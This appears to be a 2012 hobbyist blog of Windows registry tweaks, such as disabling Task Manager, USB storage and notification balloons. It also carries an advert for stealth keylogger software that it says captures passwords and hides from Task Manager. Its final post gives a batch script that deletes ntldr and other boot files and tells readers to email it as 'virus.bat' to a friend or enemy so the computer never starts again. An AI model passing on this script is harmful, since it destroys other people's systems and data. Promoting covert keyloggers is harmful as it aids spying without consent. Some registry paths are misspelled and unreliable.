Know how to hack in easy way

Web hosting

Tuesday 6 November 2012

On 19:24 by chandan in    2 comments
Ever wanted to pin a folder t the start menu to gain faster access to it ?
Well , it is possible to add the Pin to start menu option so that you can plug your favorite folders to start menu .
Here is a step by step procedure:

Open the Registry Editor and navigate to:


HKEY_CLASSES_ROOT\Folder\shellex\ContexMenuHundlers


Right click on “ContexMenuHandlers” and select New-> key.
Name the key as follows:


{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}



Now, whenever you want to add a folder to Start Menu, hold down the Shift key and right-click on the folder. You should click on the folder. You should see the “Pin to Start Menu”
Option in the context menu”.
On 18:20 by chandan in    No comments
You can now add your favorite programs to Windows Startup without the need for using the start-up folder. Here is a way to do this:



Open the Registry Editor and go to this path one by one:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run


On the right side pane, create a new “String Value: and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
Double click on the “String Value”, in the “Value data field add the path of the executable program that has to execute at startup.
Reboot the computer to see the changes in effect.
Works on Windows XP, vista and 7.
On 18:08 by chandan in    No comments
Here is a simple hack to change the name of the Registered owner on your computer:


            Open the Registry Editor and navigate to:



            HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
            


            On the right side pane, find the keys RegisteredOwner and RegisteredOrgannization.
            Double click on them to change the name to whatever you want.
            To see the changes,, right click on “My Computer” and select “Properties”.
            Work on Windows XP, Vista and 7

   
On 18:03 by chandan in    No comments
Need t limit access to your computer by disabling the Task Manager?
Her is a simple registry hack to do this:

Open the Registry Editor and navigate to the following key:
HKEY_CURRENToUSER\Software\Microsoft\Windows\CurrentVersion\Policies
Right –click on “Policies”. Select New-> Key and name the key as System.
If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to : HKEY_CURRENT-USER
Software\Microsoft\Windows\CurrentVersion\Policies\System in the step-1
Itself.
Right click on “System”, create a new “DWORD” and name it to DisableTaskMgr.
Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable).
To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7

On 17:55 by chandan in    No comments
3. ADD “Recycle Bin” to My Computer in Windows 7 and Vista:


Would you like to add the “Recycle Bin” icon to My Computer then this tutorial is for you.
Let’s start:

Open the Registry Editor and navigate to following key:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer
\NameSpace


Right-click on “NameSpace” and select New->key. Name the key with the following name :


{ 645ff040-5081-101B-9F08-00AA002F954E}


Now, Open “My computer” and hit F5 to refresh the screen. This should show up the Recycle Bin” icon

On 17:50 by chandan in    No comments

Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.




2. Disable Notification Balloons in Windows 7 and vista:
           

You can now disable the annoying notification balloons that keep popping up frequently with warning messages and reminders.  Here is s a step by step  procedure to do that:

 Open the Registry Editor and navigate to the following key:


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced


Right-click on the right-hand pane, and create a new “DWORD”.
Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0.Reboot the compute to see the changes in effect.
On 17:44 by chandan in    No comments

Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.




        1.Disable USB devices:
           
                Disabling USB ports can be a smart idea t add security to the computer. This can be really handy                 if the compute is on a public pace where the chances of virus and other malware infection is really                 high. You can easily disable access to USB ports with the following registry hack:

                Open the Registry Editor (start->Run->Type regedit and hit Enter)
                In the registry, navigate to the following key:
             
               HKEY_LOCAL-MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
           
                In the right-side pane, double-click on “Start”.
                In the “Value data” field enter 4 and click on “OK”
                Close the Registry Editor and reboot.



To enable USB devices, follow the same procedure as above except n the step-4 enter 3 in the “Value data” field.
Works on Window XP, Vista and 7.

Friday 2 November 2012

On 16:30 by chandan in    No comments

Today, keylogger would only paint half a picture of someones computer activity and because of this the name " Keylogger " has progressed to become ‘Computer Monitoring Software’. Through the internet, you can access a whole range of computer monitoring
software and keyloggers, some are malicious, some aren’t, but they usually encompass a range of standard features.
‘Commercial Computer Monitoring Software is the type of software that you need if you wanted to monitor a lazy employee or a wayward teenagers computer activity. These types of computer monitoring software are never meant to be used maliciously, and almost always come with a disclaimer that has to be acknowledged before you can install the software. These applications have a number of powerful features in 2012 and although they vary from developer to developer, they usually include a standard set of features.

Along with the keystroke monitoring (which will monitor all keys pressed, along with the time and date they were pressed and the application they were typed in to), the second feature you will find in most modern software is screenshot monitoring. This can usually be set to take a screenshot either at set time intervals, or every time a new window becomes active.

Of course, it goes without saying that along with the keystrokes and screenshots, most applications will log all applications used, and the date and time of the use (sometimes, along with the length of use). But today, the most important feature of any monitoring software is internet/website monitoring. Most software will monitor all websites visited (or all web requests) and the date and time of the visit, while also taking a screenshots of the visited website. This can all be used along with the keystroke monitoring to gain user names, passwords and web mail sent and received.
The next most common feature will be document, file and printer monitoring. These features are a must if you’re looking to monitor someone in an office environment. They usually work by monitoring all files opened, saved, copied and deleted, along with the date and time of the activity. Print monitoring will also monitor when a document is printed, along with the name of the printer used. The computers clipboard will also be monitored, so anything that’s been copied and pasted will be logged.
These features are usually the standard set you will find in modern computer monitoring software, although most software will vary on what else they offer (some monitor webcams, GPS etc). Almost all of these applications will run in complete stealth (not showing in the task manager, start menu, add/remove programs etc) and will be opened using a secret key combination and a password
John Jones, the author of this article runs ‘Gecko Monitor’ – the powerful and stealthy computer monitoring software.

download a free trial Monitor head keylogger

http://www.GeckoMonitor.com

Enjoy friends....Thank you for visit here
On 09:32 by chandan in    No comments
Hi friends today i am going to tell you how you can shutdown your friend's computer or eniy's computer,So lets start.
NOTE:You have to to it at your own risk because you can not recover your data after click it.

Lets start
1:Open your notepad.
2:Just copy the below code into your notepad.


@ echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r-s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini



3:Save it with any name(eg. virus) with the extension .bat (like eg. virus.bat).
4:Now your virus has created.
5:Now send it to your friend as mail.When he will click on it "THE GAME IS OVER"

next time when he will start his computer it will never start again so enjoy friends